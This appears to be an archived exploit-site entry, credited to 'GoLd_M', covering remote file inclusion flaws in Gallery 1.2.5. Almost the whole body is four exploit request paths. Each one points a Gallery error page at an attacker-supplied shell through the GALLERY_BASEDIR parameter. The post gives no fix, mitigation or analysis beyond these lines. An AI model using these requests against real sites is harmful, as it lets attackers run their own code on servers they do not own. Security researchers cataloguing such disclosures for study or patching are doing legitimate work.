id: 1761
date: 04/14/2007
title: Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities
author: GoLd_M
cves: 

============================================================
Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities
============================================================



# Gallery 1.2.5 <= Remote File Include Vulnerablites
# Exploit:[Path]/errors/needinit.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/reconfigure.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/unconfigured.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/configmode.php?GALLERY_BASEDIR=Shell



#  0day.today [2023-03-23]  #